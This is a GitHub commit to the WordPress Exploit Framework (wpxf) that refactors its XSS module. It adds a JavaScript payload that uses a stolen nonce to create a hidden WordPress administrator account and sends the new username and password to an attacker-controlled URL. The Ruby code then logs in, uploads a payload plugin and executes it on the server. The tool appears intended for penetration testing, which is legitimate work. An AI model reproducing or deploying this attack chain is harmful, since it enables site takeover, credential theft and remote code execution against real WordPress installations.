Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit b0f3e87

Browse files
rastatingrastating
committed
Cleanup Wpxf::WordPress::Xss mixin
1 parent f2a53b5 commit b0f3e87

File tree

2 files changed

+52
-40
lines changed

2 files changed

+52
-40
lines changed

data/js/create_wp_user.js

Lines changed: 24 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,24 @@
1+
var create_user = function () {
2+
var nonce = this.responseText.match(/id="_wpnonce_create-user" name="_wpnonce_create-user" value="([a-z0-9]+)"/i)[1];
3+
var data = new FormData();
4+
5+
data.append('action', 'createuser');
6+
data.append('_wpnonce_create-user', nonce);
7+
data.append('_wp_http_referer', '$wordpress_url_new_user');
8+
data.append('user_login', '$username');
9+
data.append('email', '$email');
10+
data.append('pass1', '$password');
11+
data.append('pass2', '$password');
12+
data.append('role', 'administrator');
13+
14+
postInfo("$wordpress_url_new_user", data, function () {
15+
var a = document.createElement("script");
16+
a.setAttribute("src", "$xss_url?u=$username&p=$password");
17+
document.head.appendChild(a);
18+
});
19+
};
20+
21+
ajax_download({
22+
path: "$wordpress_url_new_user",
23+
cb: create_user
24+
});

lib/wpxf/wordpress/xss.rb

Lines changed: 28 additions & 40 deletions
Original file line numberDiff line numberDiff line change
@@ -4,9 +4,7 @@
44
module Wpxf::WordPress::Xss
55
include Wpxf
66
include Wpxf::Net::HttpServer
7-
include Wpxf::WordPress::Login
87
include Wpxf::WordPress::Plugin
9-
108
include ERB::Util
119

1210
# Initialize a new instance of {Xss}.
@@ -64,38 +62,19 @@ def xss_ascii_encoded_include_script
6462
# @return [String] a script that will create a new admin user and post the
6563
# credentials back to {#xss_url}.
6664
def wordpress_js_create_user
67-
username = Utility::Text.rand_alpha(6)
68-
password = Utility::Text.rand_alpha(10)
69-
70-
%Q|
65+
variables = {
66+
'$wordpress_url_new_user' => wordpress_url_new_user,
67+
'$username' => Utility::Text.rand_alpha(6),
68+
'$password' => Utility::Text.rand_alpha(10),
69+
'$email' => "#{Utility::Text.rand_alpha(7)}@#{Utility::Text.rand_alpha(10)}.com",
70+
'$xss_url' => xss_url
71+
}
72+
73+
%(
7174
#{js_ajax_download}
7275
#{js_ajax_post}
73-
74-
var create_user = function () {
75-
var nonce = this.responseText.match(/id="_wpnonce_create-user" name="_wpnonce_create-user" value="([a-z0-9]+)"/i)[1];
76-
var data = new FormData();
77-
78-
data.append('action', 'createuser');
79-
data.append('_wpnonce_create-user', nonce);
80-
data.append('_wp_http_referer', '#{wordpress_url_new_user}');
81-
data.append('user_login', '#{username}');
82-
data.append('email', '#{Utility::Text.rand_alpha(7)}@#{Utility::Text.rand_alpha(10)}.com');
83-
data.append('pass1', '#{password}');
84-
data.append('pass2', '#{password}');
85-
data.append('role', 'administrator');
86-
87-
postInfo("#{wordpress_url_new_user}", data, function () {
88-
var a = document.createElement("script");
89-
a.setAttribute("src", "#{xss_url}?u=#{username}&p=#{password}");
90-
document.head.appendChild(a);
91-
});
92-
};
93-
94-
ajax_download({
95-
path: "#{wordpress_url_new_user}",
96-
cb: create_user
97-
});
98-
|
76+
#{read_js_file_with_vars('create_wp_user.js', variables)}
77+
)
9978
end
10079

10180
# Default HTTP request handler for XSS modules which will serve the script
@@ -127,21 +106,16 @@ def upload_shell(username, password)
127106
cookie = authenticate_with_wordpress(username, password)
128107
return false unless cookie
129108

130-
emit_info 'Uploading payload...'
131109
plugin_name = Utility::Text.rand_alpha(10)
132110
payload_name = Utility::Text.rand_alpha(10)
111+
112+
emit_info 'Uploading payload...'
133113
unless wordpress_upload_payload_plugin(plugin_name, payload_name, cookie)
134114
emit_error 'Failed to upload the payload'
135115
return false
136116
end
137117

138-
payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
139-
emit_info "Executing the payload at #{payload_url}..."
140-
res = execute_get_request(url: payload_url)
141-
142-
if res && res.code == 200 && !res.body.strip.empty?
143-
emit_success "Result: #{res.body}"
144-
end
118+
execute_payload(plugin_name, payload_name)
145119

146120
true
147121
end
@@ -150,4 +124,18 @@ def upload_shell(username, password)
150124
def xss_shell_success
151125
@success
152126
end
127+
128+
private
129+
130+
def execute_payload(plugin_name, payload_name)
131+
payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
132+
emit_info "Executing the payload at #{payload_url}..."
133+
res = execute_get_request(url: payload_url)
134+
emit_success "Result: #{res.body}" if res && res.code == 200 && !res.body.strip.empty?
135+
end
136+
137+
def read_js_file_with_vars(name, vars)
138+
matcher = /#{vars.keys.map { |k| Regexp.escape(k) }.join('|')}/
139+
File.read(File.join(Wpxf.data_directory, 'js', name)).gsub(matcher, vars)
140+
end
153141
end

0 commit comments

Comments
 (0)